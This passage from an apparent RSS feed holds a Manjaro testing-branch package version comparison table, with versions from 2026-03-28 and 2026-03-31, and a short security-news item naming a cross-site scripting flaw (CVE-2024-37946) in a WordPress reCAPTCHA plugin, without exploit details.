                 haskell-wai-conduit          3.0.0.4-714          3.0.0.4-716
                   haskell-wai-extra            3.1.18-41            3.1.18-44
          haskell-wai-handler-launch          3.0.3.1-811          3.0.3.1-814
             haskell-wai-http2-extra            0.1.3-376            0.1.3-379
       haskell-wai-middleware-static            0.9.3-192            0.9.3-195
                        haskell-warp             3.4.0-19             3.4.0-22
                   haskell-warp-quic            0.0.0-435            0.0.0-438
                    haskell-warp-tls            3.4.9-191            3.4.9-194
                       haskell-weigh           0.0.18-122           0.0.18-124
                       haskell-what4               1.6-78               1.6-81
                   haskell-wide-word           0.1.8.1-33           0.1.8.1-35
                   haskell-with-utf8          1.1.0.0-131          1.1.0.0-132
            haskell-wl-pprint-extras          3.5.0.5-560          3.5.0.5-561
          haskell-wl-pprint-terminfo          3.7.1.4-560          3.7.1.4-561
                        haskell-wreq            0.5.4.4-3            0.5.4.4-7
                        haskell-wuss           2.0.1.6-31           2.0.1.6-33
                      haskell-xcffib             1.6.1-14             1.6.1-15
           haskell-xdg-desktop-entry            0.1.1.3-2            0.1.1.3-3
                 haskell-xml-conduit          1.9.1.4-150          1.9.1.4-152
                  haskell-xml-hamlet            0.5.0.3-8           0.5.0.3-11
                      haskell-xmlgen          0.6.2.2-191          0.6.2.2-192
                haskell-xss-sanitize          0.3.7.2-131          0.3.7.2-132
                        haskell-yaml        0.11.11.2-205        0.11.11.2-207
                       haskell-yesod          1.6.2.1-460          1.6.2.1-464
                  haskell-yesod-auth         1.6.11.3-282         1.6.11.3-286
                  haskell-yesod-core         1.6.27.1-115         1.6.27.1-119
                  haskell-yesod-form            1.7.9.2-2            1.7.9.2-6
            haskell-yesod-persistent          1.6.0.8-520          1.6.0.8-524
                haskell-yesod-static          1.6.1.0-979          1.6.1.0-983
                  haskell-yesod-test           1.6.23-134           1.6.23-138
                           hedgewars             1.0.3-19             1.0.3-21
                               hefur               1.0-35               1.0-36
                               hepmc              3.3.1-7              3.3.1-8
                          hepmc-docs              3.3.1-7              3.3.1-8
                             hindent              6.1.1-6              6.1.1-8
                               hiprt      3.1.0.cb09c56-2      3.1.0.cb09c56-3
                             hledger               1.52-6              1.52-10
                        hledger-iadd            1.3.22-17            1.3.22-19
                          hledger-ui               1.52-7              1.52-11
                         hledger-web              1.52-10              1.52-14
                               hlint              3.6.1-8             3.6.1-10
                              hoogle         5.0.18.4-265         5.0.18.4-268
                      hopenpgp-tools           0.23.11-40           0.23.11-44
              hsa-amd-aqlprofile-bin              7.1.0-1              7.1.0-2
                           hslua-cli             1.4.3-87             1.4.3-88
                       i3status-rust             0.36.0-1             0.36.1-1
                               iaito              5.9.9-1              6.1.2-1
                      ibus-libpinyin             1.16.0-4             1.16.1-1
                               idris            1.3.4-478            1.3.4-481
                            ihaskell           0.13.0.0-9          0.13.0.0-12
                               incus             6.22.0-1             6.23.0-1
                         incus-tools             6.22.0-1             6.23.0-1
                              jasper              4.2.8-1              4.2.9-1
                          jasper-doc              4.2.8-1              4.2.9-1
                     jellyfin-ffmpeg          1:7.1.3p3-2          1:7.1.3p4-1
                                jolt              1.2.0-2              1.2.0-3
                               kicad             10.0.0-1             10.0.0-2
                          kitinerary            25.12.3-2            25.12.3-3
                              kmonad             0.4.4-89             0.4.4-91
                       kosmindoormap            25.12.3-1            25.12.3-2
                   libedataserverui4             3.58.3-1             3.58.3-2
                               libhx                5.3-1                5.4-1
              libperconaserverclient            8.4.8_8-1            8.4.8_8-2
                      libphonenumber           1:9.0.27-1           1:9.0.27-2
                            libsbsms              2.3.0-5              2.3.0-6
                           libsigrok             0.5.2-25             0.5.2-26
                           libtg_owt    0.git33.26068e2-1    0.git33.26068e2-2
                              libvlc             3.0.22-1             3.0.22-2
                              libvpx             1.16.0-2             1.16.0-3
                      libwireplumber             0.5.13-2             0.5.14-1
                              libwmf             0.2.13-4             0.2.14-1
                              libxdp              1.6.2-1              1.6.3-1
                          lincity-ng             2.14.2-2             2.14.2-3
                           lostfiles               4.14-1               4.15-1
                        lua-luarocks             3.13.0-4             3.13.0-5
                      lua51-luarocks             3.13.0-4             3.13.0-5
                      lua52-luarocks             3.13.0-4             3.13.0-5
                      lua53-luarocks             3.13.0-4             3.13.0-5
                      lua54-luarocks             3.13.0-4             3.13.0-5
                              luajit2.1.1774638290+fbb36bb-12.1.1774896198+18b087c-1
                            luarocks             3.13.0-4             3.13.0-5
                                mako             1.10.0-1             1.11.0-1
                              marble            25.12.3-1            25.12.3-2
                       marble-behaim            25.12.3-1            25.12.3-2
                       marble-common            25.12.3-1            25.12.3-2
                         marble-maps            25.12.3-1            25.12.3-2
                           marble-qt            25.12.3-1            25.12.3-2
                              maxima             5.49.0-7             5.49.0-8
                          maxima-ecl             5.49.0-7             5.49.0-8
                          maxima-fas             5.49.0-7             5.49.0-8
                         maxima-sbcl             5.49.0-7             5.49.0-8
                             melange             0.46.1-1             0.47.0-1
                          merkaartor            0.20.0-20            0.20.0-21
                               mgard              1.6.0-5              1.6.0-6
                           mighttpd2             4.0.4-25             4.0.4-28
                            migraphx              7.2.0-1              7.2.0-2
                           miniupnpd              2.3.9-2             2.3.10-1
                                mise           2026.3.8-1          2026.3.17-1
                               mixxx              2.5.4-2              2.5.4-3
                     mkdocs-material              9.7.5-1              9.7.6-1
                                moor             2.11.1-1             2.12.0-1
                                mosh             1.4.0-28             1.4.0-29
                           mosquitto             2.0.22-2              2.1.2-1
                              mumble            1.5.857-5            1.5.857-6
                       mumble-server            1.5.857-5            1.5.857-6
                              nageru              2.3.2-2              2.3.2-3
                                ncnn           20260113-3           20260113-4
                               ndctl                 82-1                 83-1
                             neovide             0.15.2-2             0.16.0-1
                              neovim             0.11.6-1             0.11.7-1
                             netdata              2.9.0-1              2.9.0-2
               netfilter-fullconenat      r73.0cf3b48-503      r73.0cf3b48-504
                    nextcloud-client           2:33.0.0-1           2:33.0.1-1
                             ngspice               45.2-2                 46-1
                              nickel             1.16.0-2             1.16.0-3
                         nickel-docs             1.16.0-2             1.16.0-3
              nickel-language-server             1.16.0-2             1.16.0-3
                         nodejs-yaml              2.3.1-1              2.3.2-1
                   npm-check-updates             19.5.0-1             19.6.0-1
                                nrpe              4.1.1-1              4.1.2-1
                              nsjail               3.4-22               3.4-23
                              ollama             0.18.3-1             0.19.0-1
                         ollama-cuda             0.18.3-1             0.19.0-1
                         ollama-docs             0.18.3-1             0.19.0-1
                         ollama-rocm             0.18.3-1             0.19.0-1
                       ollama-vulkan             0.18.3-1             0.19.0-1
                                onnx           1:1.20.1-1           1:1.20.1-2
                     onnxruntime-cpu             1.24.4-3             1.24.4-4
                    onnxruntime-cuda             1.24.4-3             1.24.4-4
                onnxruntime-opt-cuda             1.24.4-3             1.24.4-4
                onnxruntime-opt-rocm             1.24.4-3             1.24.4-4
                    onnxruntime-rocm             1.24.4-3             1.24.4-4
                   open-policy-agent             1.15.0-1             1.15.1-1
                            opencode              1.3.3-1              1.3.8-1
                              opencv             4.13.0-3             4.13.0-4
                         opencv-cuda             4.13.0-3             4.13.0-4
                      opencv-samples             4.13.0-3             4.13.0-4
                             openrgb             1.0rc2-5             1.0rc2-6
                          pandoc-cli               3.5-18                3.6-2
                     pandoc-crossref           0.3.19-182           0.3.19-188
                         pandoc-plot            1.9.1-256            1.9.1-263
                         pandora_box             0.20.0-1             0.20.1-1
                            paraview             6.0.1-10             6.0.1-11
                            pd-sfizz             1.2.3-12             1.2.3-13
                      percona-server            8.4.8_8-1            8.4.8_8-2
              percona-server-clients            8.4.8_8-1            8.4.8_8-2
             perl-business-isbn-data       20260325.001-1       20260328.001-1
                         perl-libwww               6.81-2               6.82-1
                     perl-xml-parser               2.48-1               2.49-1
                            php-grpc             1.78.1-2             1.80.0-1
                     php-legacy-grpc             1.78.1-2             1.80.0-1
                     platformio-core             6.1.19-1             6.1.19-3
                platformio-core-udev             6.1.19-1             6.1.19-3
                      podman-desktop             1.25.1-1             1.26.2-1
                           postgrest           10.0.0-532             10.1.0-2
                            protobuf               33.1-4               34.1-1
                          protobuf-c              1.5.2-8              1.5.2-9
                      proton-vpn-cli              0.1.7-1              0.1.8-1
                  proton-vpn-gtk-app             4.15.0-1             4.15.1-1
                   protonmail-bridge             3.23.1-1             3.23.1-2
              protonmail-bridge-core             3.23.1-1             3.23.1-2
                        prusa-slicer              2.9.4-7              2.9.4-8
                           pt2-clone               1.85-1               1.87-1
                     python-cairosvg              2.8.2-1              2.9.0-1
                 python-cinderclient              9.7.0-1              9.8.0-1
                   python-cloudflare             2.15.1-1             2.16.0-1
               python-configargparse              1.7.3-1              1.7.4-1
                    python-curl_cffi             0.14.0-6             0.14.0-7
                     python-deepdiff              8.1.1-1              8.2.0-1
                     python-eth-hash              0.7.1-1              0.8.0-1
                        python-faker             40.9.0-1            40.10.0-1
                  python-fastnumbers              5.1.1-2              5.1.1-3
                     python-flasgger            0.9.7.1-7                    -
                python-flask-restful             0.3.10-6                    -
                        python-gdstk             0.9.46-1             0.9.47-1
     python-googleapis-common-protos             1.73.0-1             1.73.1-1
                       python-grpcio             1.78.1-2             1.80.0-1
                 python-grpcio-tools             1.78.1-2             1.80.0-1
                     python-identify             2.6.17-1             2.6.18-2
           python-importlib-metadata              8.7.1-3              9.0.0-1
                  python-json-logger              4.0.0-1              4.1.0-1
                         python-lmdb              2.1.1-1              2.2.0-1
                      python-mockito              2.0.0-1              2.0.1-1
                     python-narwhals             2.18.0-1             2.18.1-1
                        python-numpy              2.4.3-1              2.4.4-1
                         python-onnx           1:1.20.1-1           1:1.20.1-2
              python-onnxruntime-cpu             1.24.4-3             1.24.4-4
             python-onnxruntime-cuda             1.24.4-3             1.24.4-4
         python-onnxruntime-opt-cuda             1.24.4-3             1.24.4-4
         python-onnxruntime-opt-rocm             1.24.4-3             1.24.4-4
             python-onnxruntime-rocm             1.24.4-3             1.24.4-4
                       python-opencv             4.13.0-3             4.13.0-4
                  python-opencv-cuda             4.13.0-3             4.13.0-4
              python-openstackclient              8.0.0-1              8.1.0-1
                 python-openstacksdk              4.4.0-2              4.5.0-1
                       python-orjson             3.11.7-1             3.11.7-2
                    python-oslo-i18n              6.7.1-1              6.7.2-1
                      python-plexapi             4.18.0-1             4.18.1-1
                      python-protego              0.4.0-1              0.5.0-1
                     python-protobuf               33.1-4               34.1-1
          python-proton-vpn-api-core             4.16.0-1             4.17.2-1
                 python-pychromecast             14.0.9-4            14.0.10-1
                python-pydantic-core           3:2.41.5-3           3:2.41.5-4
                       python-pygit2             1.19.1-2             1.19.2-1
                     python-pypandoc             1.16.2-1               1.17-1
                     python-pypubsub             4.0.3-11              4.0.4-1
                       python-pysdl3           0.9.10b0-1           0.9.11b0-1
                      python-pytorch             2.10.0-3             2.10.0-4
                 python-pytorch-cuda             2.10.0-3             2.10.0-4
                  python-pytorch-opt             2.10.0-3             2.10.0-4
             python-pytorch-opt-cuda             2.10.0-3             2.10.0-4
             python-pytorch-opt-rocm             2.10.0-3             2.10.0-4
                 python-pytorch-rocm             2.10.0-3             2.10.0-4
                        python-regex          2026.2.28-1          2026.3.32-1
                     python-requests             2.32.5-4             2.33.1-1
              python-setuptools-rust             1.12.0-3             1.12.1-1
                        python-sybil              6.1.1-2              7.0.0-1
                    python-testtools              2.8.3-2              2.8.4-1
                      python-textual              8.1.1-1              8.2.1-1
                        python-tomli              2.4.0-1              2.4.1-1
                          python-tox             4.32.0-1             4.33.0-1
                       python-triton              3.5.1-3              3.5.1-4
                        python-urwid              3.0.5-1              4.0.0-1
                   python-validators             0.30.0-1             0.31.0-1
                        python-w3lib              2.3.0-2              2.3.1-1
                     python-werkzeug              3.1.5-1              3.1.6-1
                    python-z3-solver             4.15.4-2             4.16.0-1
                                qgis              4.0.0-1              4.0.0-2
                            qt6-grpc             6.11.0-1             6.11.0-2
                          quickshell              0.2.1-5              0.2.1-6
                           qwen-code             0.13.1-1             0.13.2-1
                            r2ghidra              5.9.8-1              6.1.2-1
                             radare2              5.9.8-1              6.1.2-1
                               razor               2.86-3               2.87-2
                                 re2       2:2025.11.05-1       2:2025.11.05-3
                              reaper               7.66-1               7.67-1
                               rizin              0.8.1-2              0.8.2-1
                               rocal              7.2.0-1              7.2.0-2
                          rofi-emoji              4.1.0-2              4.1.0-3
                          rpi-imager              2.0.6-2              2.0.6-3
                          rubberband              4.0.0-1              4.0.0-2
                   rubberband-ladspa              4.0.0-1              4.0.0-2
                      rubberband-lv2              4.0.0-1              4.0.0-2
                     rubberband-vamp              4.0.0-1              4.0.0-2
                    ruby-addressable              2.8.8-1              2.8.9-1
                          ruby-async             2.34.0-1             2.38.1-1
                ruby-async-container             0.31.0-1             0.34.4-1
                     ruby-async-pool             0.11.1-1             0.11.2-1
                  ruby-async-service             0.19.1-1             0.21.0-1
                     ruby-chef-utils            19.2.27-1            19.2.32-1
                ruby-google-protobuf               33.1-4               34.1-1
                           ruby-grpc             1.78.1-1             1.80.0-1
                       ruby-io-event             1.14.2-1             1.14.5-1
                         ruby-loofah             2.25.0-1             2.25.1-1
                            ruby-lsp             0.26.6-1             0.26.9-1
                       ruby-maxitest              6.1.0-1              6.2.0-1
            ruby-net-http-persistent              4.0.7-1              4.0.8-1
                  ruby-protocol-http             0.59.0-1             0.60.0-1
                  ruby-protocol-rack             0.21.1-1             0.22.0-1
                  ruby-public_suffix              7.0.2-1              7.0.5-1
           ruby-rails-html-sanitizer              1.6.2-3              1.7.0-1
            ruby-repl_type_completor             0.1.13-1             0.1.15-1
                         ruby-sequel             5.99.0-1            5.101.0-1
                 ruby-sorbet-runtime          0.6.12942-1          0.6.13068-1
                        ruby-sqlite3              2.9.1-1              2.9.2-1
        ruby-sus-fixtures-async-http             0.12.0-1             0.12.1-1
                       ruby-zeitwerk              2.7.3-1              2.7.5-1
                      rustypaste-cli              0.9.4-1              0.9.5-1
                           rz-cutter              2.4.1-5              2.4.1-6
                                sbcl              2.6.2-1              2.6.3-1
                           scap-dkms             0.20.0-9             0.23.1-1
                             scummvm           2026.1.0-1           2026.2.0-1
                          sentry-cli              3.3.4-1              3.3.5-1
                       sentry-native             0.13.3-1             0.13.4-1
                               sfizz              1.2.3-8             1.2.3-10
                           sfizz-lib              1.2.3-8             1.2.3-10
                           sfizz-lv2             1.2.3-12             1.2.3-13
                    sfizz-standalone              1.2.3-8             1.2.3-10
                            sfizz-ui             1.2.3-12             1.2.3-13
                          sfizz-vst3             1.2.3-12             1.2.3-13
                         shadowsocks    3.0.0a.20180219-9                    -
                          shellcheck            0.11.0-79            0.11.0-81
                            skaffold             2.18.0-1             2.18.2-1
                                skim              4.0.1-1              4.2.0-1
                         slicer-udev              2.9.4-7              2.9.4-8
                            smplayer             25.6.0-1             25.6.0-2
                            soapyuhd             0.4.1-14             0.4.1-15
                      spotify-player             0.22.1-1             0.23.0-1
                           sqlcipher             4.13.0-1             4.14.0-1
                            sqlfluff              4.0.4-2              4.1.0-1
                             sslscan              2.2.1-1              2.2.2-1
                               stack          2.9.3.1-118          2.9.3.1-123
                             step-ca             0.29.0-1             0.30.2-1
                          strongswan              6.0.4-2              6.0.5-1
                             stumpwm              24.11-9             24.11-10
                     stylish-haskell          0.14.5.0-11          0.14.5.0-13
                               swtpm             0.10.1-1             0.10.1-2
                                 syd             3.51.0-1             3.51.2-1
                           syslog-ng             4.11.0-1             4.11.0-2
                      syslog-ng-amqp             4.11.0-1             4.11.0-2
                    syslog-ng-geoip2             4.11.0-1             4.11.0-2
                     syslog-ng-kafka             4.11.0-1             4.11.0-2
                   syslog-ng-mongodb             4.11.0-1             4.11.0-2
                    syslog-ng-python             4.11.0-1             4.11.0-2
                     syslog-ng-redis             4.11.0-1             4.11.0-2
                      syslog-ng-smtp             4.11.0-1             4.11.0-2
                      syslog-ng-snmp             4.11.0-1             4.11.0-2
                       syslog-ng-sql             4.11.0-1             4.11.0-2
                             systing              1.0.0-1              1.0.0-2
                            taffybar             4.1.0-13             4.1.0-18
                      tamarin-prover            1.12.0-10            1.12.0-14
                     taskwarrior-tui             0.26.7-1             0.26.8-1
                     tauon-music-box              9.1.1-1              9.1.2-1
                    telegram-desktop              6.6.4-6              6.6.4-7
                          terragrunt             0.99.4-2             0.99.5-1
                              thunar             4.20.7-1             4.20.8-1
                         thunderbird              149.0-1            149.0.1-1
                 thunderbird-i18n-af              149.0-1            149.0.1-1
                 thunderbird-i18n-ar              149.0-1            149.0.1-1
                thunderbird-i18n-ast              149.0-1            149.0.1-1
                 thunderbird-i18n-be              149.0-1            149.0.1-1
                 thunderbird-i18n-bg              149.0-1            149.0.1-1
                 thunderbird-i18n-br              149.0-1            149.0.1-1
                 thunderbird-i18n-ca              149.0-1            149.0.1-1
                thunderbird-i18n-cak              149.0-1            149.0.1-1
                 thunderbird-i18n-cs              149.0-1            149.0.1-1
                 thunderbird-i18n-cy              149.0-1            149.0.1-1
                 thunderbird-i18n-da              149.0-1            149.0.1-1
                 thunderbird-i18n-de              149.0-1            149.0.1-1
                thunderbird-i18n-dsb              149.0-1            149.0.1-1
                 thunderbird-i18n-el              149.0-1            149.0.1-1
              thunderbird-i18n-en-gb              149.0-1            149.0.1-1
              thunderbird-i18n-en-us              149.0-1            149.0.1-1
              thunderbird-i18n-es-ar              149.0-1            149.0.1-1
              thunderbird-i18n-es-es              149.0-1            149.0.1-1
                 thunderbird-i18n-et              149.0-1            149.0.1-1
                 thunderbird-i18n-eu              149.0-1            149.0.1-1
                 thunderbird-i18n-fi              149.0-1            149.0.1-1
                 thunderbird-i18n-fr              149.0-1            149.0.1-1
              thunderbird-i18n-fy-nl              149.0-1            149.0.1-1
              thunderbird-i18n-ga-ie              149.0-1            149.0.1-1
                 thunderbird-i18n-gd              149.0-1            149.0.1-1
                 thunderbird-i18n-gl              149.0-1            149.0.1-1
                 thunderbird-i18n-he              149.0-1            149.0.1-1
                 thunderbird-i18n-hr              149.0-1            149.0.1-1
                thunderbird-i18n-hsb              149.0-1            149.0.1-1
                 thunderbird-i18n-hu              149.0-1            149.0.1-1
              thunderbird-i18n-hy-am              149.0-1            149.0.1-1
                 thunderbird-i18n-id              149.0-1            149.0.1-1
                 thunderbird-i18n-is              149.0-1            149.0.1-1
                 thunderbird-i18n-it              149.0-1            149.0.1-1
                 thunderbird-i18n-ja              149.0-1            149.0.1-1
                 thunderbird-i18n-ka              149.0-1            149.0.1-1
                thunderbird-i18n-kab              149.0-1            149.0.1-1
                 thunderbird-i18n-kk              149.0-1            149.0.1-1
                 thunderbird-i18n-ko              149.0-1            149.0.1-1
                 thunderbird-i18n-lt              149.0-1            149.0.1-1
                 thunderbird-i18n-ms              149.0-1            149.0.1-1
              thunderbird-i18n-nb-no              149.0-1            149.0.1-1
                 thunderbird-i18n-nl              149.0-1            149.0.1-1
              thunderbird-i18n-nn-no              149.0-1            149.0.1-1
              thunderbird-i18n-pa-in              149.0-1            149.0.1-1
                 thunderbird-i18n-pl              149.0-1            149.0.1-1
              thunderbird-i18n-pt-br              149.0-1            149.0.1-1
              thunderbird-i18n-pt-pt              149.0-1            149.0.1-1
                 thunderbird-i18n-rm              149.0-1            149.0.1-1
                 thunderbird-i18n-ro              149.0-1            149.0.1-1
                 thunderbird-i18n-ru              149.0-1            149.0.1-1
                 thunderbird-i18n-sk              149.0-1            149.0.1-1
                 thunderbird-i18n-sl              149.0-1            149.0.1-1
                 thunderbird-i18n-sq              149.0-1            149.0.1-1
                 thunderbird-i18n-sr              149.0-1            149.0.1-1
              thunderbird-i18n-sv-se              149.0-1            149.0.1-1
                 thunderbird-i18n-th              149.0-1            149.0.1-1
                 thunderbird-i18n-tr              149.0-1            149.0.1-1
                 thunderbird-i18n-uk              149.0-1            149.0.1-1
                 thunderbird-i18n-uz              149.0-1            149.0.1-1
                 thunderbird-i18n-vi              149.0-1            149.0.1-1
              thunderbird-i18n-zh-cn              149.0-1            149.0.1-1
              thunderbird-i18n-zh-tw              149.0-1            149.0.1-1
                         timescaledb             2.26.0-1             2.26.1-1
             timescaledb-old-upgrade             2.26.0-1             2.26.1-1
                       tokio-console             0.1.14-1             0.1.14-2
                             traefik             3.6.11-1             3.6.12-1
                                tree              2.3.1-1              2.3.2-1
                             udiskie              2.6.1-1              2.6.2-1
                         udisks2-qt5              5.0.6-2                    -
              ultramaster-kr106-clap              2.4.4-1            2.4.6.1-1
               ultramaster-kr106-lv2              2.4.4-1            2.4.6.1-1
              ultramaster-kr106-vst3              2.4.4-1            2.4.6.1-1
                               usage             2.18.2-1              3.2.0-1
                            usbguard              1.1.4-4              1.1.4-5
                                vala            0.56.18-5            0.56.19-1
                             vcspull             1.58.0-1             1.58.1-1
                    vhba-module-dkms          20250329-70          20250329-71
                                 vim           9.2.0204-2           9.2.0272-1
                         vim-runtime           9.2.0204-2           9.2.0272-1
                                 vis 0.9.r397.gda84fe70-1 0.9.r399.g1a4fb0fd-1
             vis-syntax-highlighting 0.9.r397.gda84fe70-1 0.9.r399.g1a4fb0fd-1
                                 vlc             3.0.22-1             3.0.22-2
                             vlc-cli             3.0.22-1             3.0.22-2
                     vlc-gui-ncurses             3.0.22-1             3.0.22-2
                          vlc-gui-qt             3.0.22-1             3.0.22-2
                      vlc-gui-skins2             3.0.22-1             3.0.22-2
                   vlc-plugin-a52dec             3.0.22-1             3.0.22-2
                    vlc-plugin-aalib             3.0.22-1             3.0.22-2
                     vlc-plugin-alsa             3.0.22-1             3.0.22-2
                      vlc-plugin-aom             3.0.22-1             3.0.22-2
                  vlc-plugin-archive             3.0.22-1             3.0.22-2
                  vlc-plugin-aribb24             3.0.22-1             3.0.22-2
                  vlc-plugin-aribb25             3.0.22-1             3.0.22-2
                      vlc-plugin-ass             3.0.22-1             3.0.22-2
                    vlc-plugin-avahi             3.0.22-1             3.0.22-2
                   vlc-plugin-bluray             3.0.22-1             3.0.22-2
                     vlc-plugin-caca             3.0.22-1             3.0.22-2
                     vlc-plugin-cddb             3.0.22-1             3.0.22-2
               vlc-plugin-chromecast             3.0.22-1             3.0.22-2
                    vlc-plugin-dav1d             3.0.22-1             3.0.22-2
                     vlc-plugin-dbus             3.0.22-1             3.0.22-2
         vlc-plugin-dbus-screensaver             3.0.22-1             3.0.22-2
                      vlc-plugin-dca             3.0.22-1             3.0.22-2
                      vlc-plugin-dvb             3.0.22-1             3.0.22-2
                      vlc-plugin-dvd             3.0.22-1             3.0.22-2
                    vlc-plugin-faad2             3.0.22-1             3.0.22-2
                   vlc-plugin-ffmpeg             3.0.22-1             3.0.22-2
                 vlc-plugin-firewire             3.0.22-1             3.0.22-2
                     vlc-plugin-flac             3.0.22-1             3.0.22-2
               vlc-plugin-fluidsynth             3.0.22-1             3.0.22-2
                 vlc-plugin-freetype             3.0.22-1             3.0.22-2
                      vlc-plugin-gme             3.0.22-1             3.0.22-2
                   vlc-plugin-gnutls             3.0.22-1             3.0.22-2
                vlc-plugin-gstreamer             3.0.22-1             3.0.22-2
                  vlc-plugin-inflate             3.0.22-1             3.0.22-2
                     vlc-plugin-jack             3.0.22-1             3.0.22-2
                  vlc-plugin-journal             3.0.22-1             3.0.22-2
                     vlc-plugin-jpeg             3.0.22-1             3.0.22-2
                     vlc-plugin-kate             3.0.22-1             3.0.22-2
                  vlc-plugin-kwallet             3.0.22-1             3.0.22-2
                vlc-plugin-libsecret             3.0.22-1             3.0.22-2
                     vlc-plugin-lirc             3.0.22-1             3.0.22-2
                  vlc-plugin-live555             3.0.22-1             3.0.22-2
                      vlc-plugin-lua             3.0.22-1             3.0.22-2
                      vlc-plugin-mad             3.0.22-1             3.0.22-2
                 vlc-plugin-matroska             3.0.22-1             3.0.22-2
                     vlc-plugin-mdns             3.0.22-1             3.0.22-2
                  vlc-plugin-modplug             3.0.22-1             3.0.22-2
                    vlc-plugin-mpeg2             3.0.22-1             3.0.22-2
                   vlc-plugin-mpg123             3.0.22-1             3.0.22-2
                      vlc-plugin-mtp             3.0.22-1             3.0.22-2
                 vlc-plugin-musepack             3.0.22-1             3.0.22-2
                      vlc-plugin-nfs             3.0.22-1             3.0.22-2
                   vlc-plugin-notify             3.0.22-1             3.0.22-2
                      vlc-plugin-ogg             3.0.22-1             3.0.22-2
                     vlc-plugin-opus             3.0.22-1             3.0.22-2
                      vlc-plugin-png             3.0.22-1             3.0.22-2
                    vlc-plugin-pulse             3.0.22-1             3.0.22-2
                vlc-plugin-quicksync             3.0.22-1             3.0.22-2
               vlc-plugin-samplerate             3.0.22-1             3.0.22-2
                      vlc-plugin-sdl             3.0.22-1             3.0.22-2
                     vlc-plugin-sftp             3.0.22-1             3.0.22-2
                    vlc-plugin-shout             3.0.22-1             3.0.22-2
                      vlc-plugin-smb             3.0.22-1             3.0.22-2
                     vlc-plugin-soxr             3.0.22-1             3.0.22-2
                    vlc-plugin-speex             3.0.22-1             3.0.22-2
                      vlc-plugin-srt             3.0.22-1             3.0.22-2
                      vlc-plugin-svg             3.0.22-1             3.0.22-2
                      vlc-plugin-tag             3.0.22-1             3.0.22-2
                   vlc-plugin-theora             3.0.22-1             3.0.22-2
                  vlc-plugin-twolame             3.0.22-1             3.0.22-2
                     vlc-plugin-udev             3.0.22-1             3.0.22-2
                     vlc-plugin-upnp             3.0.22-1             3.0.22-2
                   vlc-plugin-vorbis             3.0.22-1             3.0.22-2
                      vlc-plugin-vpx             3.0.22-1             3.0.22-2
                     vlc-plugin-x264             3.0.22-1             3.0.22-2
                     vlc-plugin-x265             3.0.22-1             3.0.22-2
                      vlc-plugin-xml             3.0.22-1             3.0.22-2
                     vlc-plugin-zvbi             3.0.22-1             3.0.22-2
                     vlc-plugins-all             3.0.22-1             3.0.22-2
                    vlc-plugins-base             3.0.22-1             3.0.22-2
                   vlc-plugins-extra             3.0.22-1             3.0.22-2
            vlc-plugins-video-output             3.0.22-1             3.0.22-2
           vlc-plugins-visualization             3.0.22-1             3.0.22-2
                              vmexec              0.4.0-1              0.5.2-1
                                vpnc  1:0.5.3.r539.r239-1  1:0.5.3.r557.r241-1
                         warzone2100              4.6.3-2              4.6.3-3
                           watchexec              2.5.0-1              2.5.1-1
             webrtc-audio-processing                2.1-5                2.1-6
                         wireplumber             0.5.13-2             0.5.14-1
                    wireplumber-docs             0.5.13-2             0.5.14-1
                       wireshark-cli              4.6.4-1              4.6.4-2
                        wireshark-qt              4.6.4-1              4.6.4-2
              xdg-desktop-portal-dde             1.0.13-7             1.0.14-1
                           xdp-tools              1.6.2-1              1.6.3-1
                           xfdesktop             4.20.1-3             4.20.2-1
                              xmobar             0.50-137             0.50-141
                              xmonad           0.18.0-154           0.18.0-156
                      xmonad-contrib           0.18.1-138           0.18.1-140
                         xmonad-dbus          0.1.0.2-240          0.1.0.2-243
                       xmonad-extras             0.17.3-6             0.17.3-9
                      xorg-setxkbmap              1.3.4-2              1.3.5-1
                                 xrt          1:2.21.75-5          1:2.21.75-6
                          xtrabackup            8.4.0_5-1            8.4.0_5-2
                                  z3             4.15.4-2             4.16.0-1
                             z3-java             4.15.4-2             4.16.0-1
                             zathura         2026.02.22-1         2026.03.27-1
                          zathura-cb         2026.02.03-3         2026.02.03-4
                        zathura-djvu         2026.02.03-3         2026.02.03-4
                   zathura-pdf-mupdf         2026.02.03-5         2026.02.03-6
                 zathura-pdf-poppler         2026.02.03-3         2026.02.03-4
                          zathura-ps         2026.02.03-3         2026.02.03-4
                              zettlr              4.3.0-1              4.3.1-1
                              zypper            1.14.95-1            1.14.95-2
                            ares-emu                    -                147-2
                             diffoci                    -              0.1.8-1
                         govulncheck                    -              1.1.4-1
                       libkysdk-base                    -            3.0.1.0-1
                         librashader                    -             0.10.1-2
                       python-podman                    -              5.8.0-2
                        python-pylxd                    -              2.4.0-2
                        python-ws4py                    -              0.6.0-4
                         udisks2-qt6                    -              6.0.1-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                         lib32-clang             22.1.1-1             22.1.2-1
              lib32-gst-plugins-base             1.28.1-2             1.28.1-3
         lib32-gst-plugins-base-libs             1.28.1-2             1.28.1-3
              lib32-gst-plugins-good             1.28.1-2             1.28.1-3
                     lib32-gstreamer             1.28.1-2             1.28.1-3
                        lib32-libvpx             1.15.2-2             1.16.0-2
                          lib32-llvm           1:22.1.1-1           1:22.1.2-1
                     lib32-llvm-libs           1:22.1.1-1           1:22.1.2-1
</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>5 posts - 5 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-37946 | weDevs ReCaptcha Integration Plugin up to 1.2.5 on WordPress cross site scripting]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in weDevs ReCaptcha Integration Plugin up to 1.2.5 on WordPress. This affects an unknown function. This manipulation causes cross site scripting.

This vulnerability is registered as CVE-2024-37946. Remote exploitation of the attack is poss...]]></description>
<link>https://tsecurity.de/de/3402075/sicherheitsluecken/cve-2024-37946-wedevs-recaptcha-integration-plugin-up-to-125-on-wordpress-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3402075/sicherheitsluecken/cve-2024-37946-wedevs-recaptcha-integration-plugin-up-to-125-on-wordpress-cross-site-scripting/</guid>
<pubDate>Thu, 02 Apr 2026 11:23:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
